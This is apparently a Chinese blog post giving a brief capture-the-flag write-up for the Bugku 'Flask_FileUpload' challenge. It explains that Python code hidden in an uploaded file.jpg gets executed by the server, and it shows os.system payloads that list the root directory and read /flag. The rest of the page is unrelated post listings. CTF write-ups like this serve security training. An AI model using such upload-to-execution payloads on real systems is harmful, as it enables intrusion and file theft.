技术栈

Bugku-web-Flask_FileUpload

黑白时光les2024-08-01 11:52

Bugku-web-Flask_FileUpload

查看源代码,提示用python返回结果

在file.jpg中写python代码

复制代码
import os
os.system('ls / ')

上传后查看源代码,找到flag文件夹

修改代码

复制代码
import os
os.system('cat /flag ')
上一篇:Python面试题:如何使用WebSocket实现实时Web应用
下一篇:单片机之串口通信协议
相关推荐
weixin_46846685
5 分钟前
Prometheus监控服务部署与实战指南
服务器·后端·python·docker·自动化·prometheus
花酒锄作田
10 分钟前
[Python]标准库argparse解析命令行参数使用介绍
python
卡次卡次1
14 分钟前
vibecoding起步之注意点:如何做一个聊天机器人
python·ai
Hanniel
25 分钟前
Python 元类(下):进阶与实战建议
开发语言·python
mONESY
37 分钟前
Python 字典(dict):从原理到实战,彻底搞懂哈希表核心
python
卡次卡次1
43 分钟前
vibecoding起步之注意点:从零到一:Claude Code 接入飞书文档的完整链路
python
Mikowoo007
1 小时前
机器学习_梯度计算
人工智能·python·机器学习
雪隐
1 小时前
AI股票小助手01-量化交易基础概念
人工智能·后端·python
Larcher
1 小时前
JS 变量提升:代码没动,为什么执行顺序就变了?
前端·javascript·前端框架
yingyima
1 小时前
MySQL 事件调度器速查:核心语法与实战代码
前端
热门推荐
01GitHub 镜像站点02【AI】2026 年具身智能模型和世界模型总结03DeepSeek V4 + Claude Code thinking mode 400 错误修复方案04【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法05Codex 接入 DeepSeek API 完整配置文档06裂开!ChatGPT 居然开始要手机号验证,附详细解决方法07CC-Switch & Claude 基于 Linux 服务器安装使用指南08几个好用的ip纯净度检测网站09CC-Switch 全平台下载、安装与使用全指南(Windows/macOS/Linux)10API Key 登录 Codex 也能用插件了,还支持会话删除和导出